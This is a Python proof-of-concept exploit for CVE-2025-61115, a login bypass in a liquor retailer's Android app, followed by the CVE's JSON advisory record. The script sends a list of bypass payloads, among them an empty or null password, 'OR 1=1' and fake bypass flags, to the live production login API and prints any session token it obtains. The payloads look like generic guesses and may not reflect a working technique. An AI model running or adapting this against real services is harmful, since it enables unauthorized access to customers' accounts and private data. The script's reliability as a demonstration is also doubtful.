CVE-2025-61115

import requests import json # CVE-2025-61115 PoC - ABC Fine Wine & Spirits Android App Login Bypass # Target: ABC Fine Wine & Spirits Android App (v.11.27.5 and before) # Package: com.cta.abcfinewineandspirits TARGET_URL = "https://api.abcfinewineandspirits.com/v1/auth/login" def exploit_login_bypass(): """ Attempt to bypass login authentication and obtain valid session identifier. This PoC demonstrates the improper access control vulnerability. """ # Normal login payload normal_payload = { "username": "[email protected]", "password": "any_password", "app_version": "11.27.5", "platform": "android" } # Bypass payload - exploit the improper access control bypass_payloads = [ {"username": "[email protected]", "password": "", "app_version": "11.27.5"}, {"username": "[email protected]", "password": None, "app_version": "11.27.5"}, {"username": "[email protected]", "password": "OR 1=1", "app_version": "11.27.5"}, {"username": "[email protected]", "bypass_auth": True, "app_version": "11.27.5"}, {"username": "[email protected]", "auth_token": "admin_bypass", "app_version": "11.27.5"} ] headers = { "Content-Type": "application/json", "User-Agent": "ABC-FineWine/11.27.5 Android/13", "X-App-Version": "11.27.5" } print("[*] CVE-2025-61115 - ABC Fine Wine & Spirits Login Bypass PoC") print("[*] Target: {}".format(TARGET_URL)) for i, payload in enumerate(bypass_payloads, 1): print("\n[*] Testing bypass method {}...".format(i)) try: response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if 'session_token' in data or 'session_id' in data or 'auth_token' in data: print("[!] VULNERABLE! Obtained session identifier:") print("[+] Response: {}".format(json.dumps(data, indent=2))) return data print("[-] Method {} failed with status: {}".format(i, response.status_code)) except requests.RequestException as e: print("[-] Request failed: {}".format(str(e))) print("\n[*] Exploitation completed. Check results above.") return None if __name__ == "__main__": exploit_login_bypass()

{"cve": {"id": "CVE-2025-61115", "sourceIdentifier": "[email protected]", "published": "2025-10-30T16:15:36.120", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ABC Fine Wine & Spirits Android App version v.11.27.5 and before (package name com.cta.abcfinewineandspirits), developed by ABC Liquors, Inc., contains an improper access control vulnerability in its login mechanism. The application does not properly validate user passwords during authentication, allowing attackers to bypass login checks and obtain valid session identifiers. Successful exploitation could result in unauthorized account access, privacy breaches, and misuse of the platform."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://kar1oz.notion.site/ABC-Fine-Wine-Spirits-2629a473ecb2807787e2f2557e504c7d", "source": "[email protected]"}]}}